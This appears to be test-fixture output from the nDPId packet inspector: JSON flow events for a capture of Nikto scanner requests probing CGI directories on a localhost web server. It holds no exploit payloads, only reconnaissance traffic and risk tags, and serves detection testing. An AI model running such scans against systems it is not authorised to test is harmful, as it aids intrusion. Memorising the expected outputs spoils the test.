01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276711,"pkt":"AAAAAAAAAAAAAAAACABFAADEXJRAAEAG351\/AAABfwAAAcHOH5AWt2SMpHJk2oAYAED+uAAAAQEICp1m+w+dZvsPR0VUIC9jZ2ktc3lzLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-sys\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276713,"pkt":"AAAAAAAAAAAAAAAACABFAADG5r1AAEAGVXJ\/AAABfwAAAcHQH5DCed6iQK2\/KYAYAED+ugAAAQEICp1m+xCdZvsQR0VUIC9jZ2ktbG9jYWwvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276714,"pkt":"AAAAAAAAAAAAAAAACABFAADCR6dAAEAG9Ix\/AAABfwAAAcHSH5C\/OX\/AhojitYAYAED+tgAAAQEICp1m+xKdZvsSR0VUIC9odGJpbi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
